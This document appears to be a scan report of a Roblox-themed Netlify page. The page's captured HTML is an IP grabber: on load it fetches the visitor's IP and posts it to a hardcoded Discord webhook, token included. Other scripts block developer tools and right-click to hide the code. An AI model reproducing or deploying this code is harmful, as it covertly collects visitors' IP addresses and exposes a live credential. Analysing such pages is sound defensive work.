https://rbxgeo.netlify.app/

送信済みURL:
https://rbxgeo.netlify.app/
レポート終了日:

リンク · 0件検出

JavaScript変数 · 5件検出

名前規模
onbeforetoggleobject
documentPictureInPictureobject
onscrollendobject
sendToDiscordfunction
disableRightClickfunction

コンソールログメッセージ · 4件検出

規模分類ログ
errornetwork
URL
https://rbxgeo.netlify.app/favicon.ico
テキスト
Failed to load resource: the server responded with a status of 404 ()
logother
URL
https://rbxgeo.netlify.app/
テキスト
User IP Address: 104.28.158.248
errornetwork
URL
https://discord.com/api/webhooks/1285137384803012618/f4socKKRgToMG-Giq-JnU-hy16hSxIBBp4wViGj_KQJaGTnoezEmc-XrY0LLsRgxwh4C
テキスト
Failed to load resource: the server responded with a status of 404 ()
errorother
URL
https://rbxgeo.netlify.app/
テキスト
Failed to send IP to Discord.

HTML

<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>You'Re Coocked :D</title>
</head>
<body>

<h1></h1>

<script>
    // Replace this with your Discord webhook URL
    const webhookURL = 'https://discord.com/api/webhooks/1285137384803012618/f4socKKRgToMG-Giq-JnU-hy16hSxIBBp4wViGj_KQJaGTnoezEmc-XrY0LLsRgxwh4C';

    // Function to send the IP address to the Discord webhook
    function sendToDiscord(ip) {
        const data = {
            content: `User's IP Address: ${ip}`,
        };

        // Send IP to the Discord webhook via POST request
        fetch(webhookURL, {
            method: 'POST',
            headers: {
                'Content-Type': 'application/json',
            },
            body: JSON.stringify(data),
        })
        .then(response => {
            if (response.ok) {
                console.log('IP sent to Discord successfully.');
            } else {
                console.error('Failed to send IP to Discord.');
            }
        })
        .catch(error => console.error('Error:', error));
    }

    // Get user's IP using the ipify API
    fetch('https://api.ipify.org?format=json')
        .then(response => response.json())
        .then(data => {
            const ip = data.ip;
            console.log('User IP Address:', ip);
            // Send the IP to the Discord webhook
            sendToDiscord(ip);
        })
        .catch(error => console.error('Error fetching IP:', error));
</script>





    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>



<h1></h1>

<script>
    // Listen for keydown events
    document.addEventListener('keydown', function(event) {
        // Check if F12 (keyCode 123) is pressed
        if (event.key === "F12" || event.keyCode === 123) {
            // Prevent the default action of opening the developer tools
            event.preventDefault();
            // Redirect to Google
            window.location.href = 'https://tynauri.net';
        }
    });

    // Optional: Detect right-click to prevent inspecting elements via context menu
    document.addEventListener('contextmenu', function(event) {
        event.preventDefault(); // Disable right-click
    });
</script>





    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <script>
        // Function to disable right-click
        function disableRightClick(event) {
            event.preventDefault(); // Prevent the default context menu from appearing
            alert("Right-click is disabled on this page."); // Optional alert
        }

        // Attach the event listener when the page loads
        window.onload = function() {
            document.addEventListener('contextmenu', disableRightClick);
        };
    </script>






    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Disable Inspect Methods</title>
    <script>
        // Disable right-click and keyboard shortcuts
        document.addEventListener('contextmenu', function(event) {
            event.preventDefault(); // Disable right-click
        });

        document.addEventListener('keydown', function(event) {
            if (event.key === 'F12' || 
                (event.ctrlKey && (event.key === 'i' || event.key === 'u')) || 
                (event.shiftKey && event.ctrlKey && event.key === 'i')) {
                event.preventDefault(); // Disable F12 and Ctrl+Shift+I, Ctrl+U
            }
        });
    </script>






    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script>
        document.addEventListener('keydown', function(event) {
            // Check if Ctrl + Shift + I is pressed
            if (event.ctrlKey && event.shiftKey && event.key === 'I') {
                event.preventDefault(); // Prevent the default action
                alert("Developer Tools are disabled on this page.");
            }
        });
    </script>




</body></html>